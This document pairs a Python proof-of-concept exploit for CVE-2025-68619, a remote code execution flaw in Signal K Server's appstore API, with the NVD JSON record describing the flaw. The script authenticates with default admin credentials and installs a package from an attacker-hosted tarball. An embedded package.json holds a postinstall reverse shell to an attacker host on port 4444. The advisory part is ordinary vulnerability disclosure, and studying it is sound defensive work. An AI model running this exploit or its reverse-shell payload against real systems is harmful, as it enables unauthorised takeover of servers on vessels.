CVE-2025-68619

import requests import json # CVE-2025-68619 PoC - Signal K Server RCE via malicious npm package # Target: Signal K Server < 2.19.0 TARGET_URL = "http://target:3000" USERNAME = "admin" PASSWORD = "admin" ATTACKER_SERVER = "http://attacker-server:8080" def get_auth_token(): """Authenticate and get session token""" login_url = f"{TARGET_URL}/signalk/v1/auth/login" data = {"username": USERNAME, "password": PASSWORD} response = requests.post(login_url, json=data) return response.json().get('token') def exploit_rce(token): """Install malicious npm package via appstore API""" # Malicious package.json with reverse shell postinstall script # The attacker hosts this as a tarball on their server malicious_tarball = f"{ATTACKER_SERVER}/malicious-pkg.tgz" install_url = f"{TARGET_URL}/signalk/v1/appstore/install" headers = {"Authorization": f"Bearer {token}"} # Version parameter accepts arbitrary npm specifiers including URLs payload = { "name": "@signalk/plugin-custom", "version": malicious_tarball # Can be URL, git repo, etc. } response = requests.post(install_url, json=payload, headers=headers) return response.status_code == 200 # Example malicious package.json content: MALICIOUS_PACKAGE_JSON = """ { "name": "malicious-pkg", "version": "1.0.0", "scripts": { "postinstall": "bash -i >& /dev/tcp/attacker/4444 0>&1" } } """ if __name__ == "__main__": token = get_auth_token() if token: print("[+] Authentication successful") if exploit_rce(token): print("[+] Malicious package installed, check listener for shell") else: print("[-] Exploitation failed")

{"cve": {"id": "CVE-2025-68619", "sourceIdentifier": "[email protected]", "published": "2026-01-01T19:15:53.777", "lastModified": "2026-01-06T17:57:24.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Signal K Server is a server application that runs on a central hub in a boat. Versions prior to 2.19.0 of the appstore interface allow administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any `postinstall` script defined in `package.json`, enabling arbitrary code execution. The vulnerability exists because npm's version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious `postinstall` script. Version 2.19.0 contains a patch for the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.19.0", "matchCriteriaId": "102A9593-CCDC-4532-8201-E67EEFC665E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:2.19.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "67C0C9C4-176E-457B-97BF-56EED79F4D42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:2.19.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "0F33D560-D916-45D7-AAF6-63E89BE06805"}, {"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:2.19.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "2B544F41-AFE7-454F-BE01-89AC7B954AF5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:2.19.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "BCF3D7E0-66FE-47F1-97BA-ABCF769B0D7C"}]}]}], "references": [{"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-93jc-vqqc-vvvh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}